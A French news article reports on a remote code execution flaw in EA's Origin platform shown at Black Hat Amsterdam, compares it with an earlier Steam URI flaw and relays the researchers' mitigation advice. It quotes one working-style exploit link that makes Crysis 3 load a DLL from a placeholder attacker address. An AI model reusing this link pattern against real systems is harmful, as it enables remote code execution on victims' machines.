Electronic Arts est décidément sous le feu des projecteurs ces derniers temps, et pas pour de bonnes raisons. Après les soucis de SimCity, c'est au tour de la plateforme Origin de poser des problèmes à l'éditeur, puisqu'une faille très facilement exploitable rend vulnérable n'importe quelle machine à une attaque extérieure.
Electronic Arts revendique un peu plus de 40 millions d'usagers sur sa plateforme Origin, et tous peuvent désormais être la victime d'attaques malveillantes. Nos confrères d'Ars Technica ont relevé durant la conférence Black Hat, s'étant déroulée du 12 au 15 mars à Amsterdam qu'une équipe originaire de Malte est parvenue à utiliser Origin pour attaquer des Macs et des PC.
Donato Ferrante et Luigi Auriemma, deux chercheurs travaillant pour ReVuln, et auteurs de cette découverte, expliquent que la faille découverte ne demande que quelques secondes pour être exploitée. Dans certains cas, aucune interaction avec la victime n'est requise. Notez qu'il n'est pas nécéssaire qu'Origin soit actif pour que la brêche fonctionne, sa seule installation sur le système est suffisante.
Une démonstration qui semble très simple
La démonstration faite par les deux hommes est assez simple, il suffit de trouver un moyen de permettre d'activer l'exécution de code à distance sur la machine cible. Dans le cas d'un joueur de Crysis 3, les chercheurs utilisent le NVidia Benchmark framework intégré dans le moteur CryEngine. Il suffit ensuite de créer un lien Origin afin que la plateforme récupère au prochain lancement du jeu le fichier que l'on souhaite introduire dans la machine cible. Le lien prend la forme suivante :
origin://LaunchGame/71503?CommandParams= -openautomate \\IP_ATTAQUANT\evil.dll
La faille rappelle une de celles découvertes dans Steam
Cependant, il faut noter que la plateforme d'EA n'est pas la seule à être touchée par ce genre de vulnérabilité. En effet, un cas similaire avait touché Steam au mois d'octobre. Si l'intégrité du client de la plateforme n'était pas atteinte, certains pirates faisaient précéder leurs URLs par « Steam:// » pour berner les navigateurs, clients emails ou toutes sortes d'applications afin qu'elles exécutent du code malveillant.
La parade était assez simple puisqu'il suffisait de désactiver le lancement automatique des URL débutant par Steam://. Le même genre de solution est proposée par les chercheurs aux utilisateurs d'Origin, qui leur suggèrent de paramétrer leur navigateur afin qu'il demande une confirmation avant d'exécuter un tel lien. Nous vous laissons maintenant découvrir la faille en images.
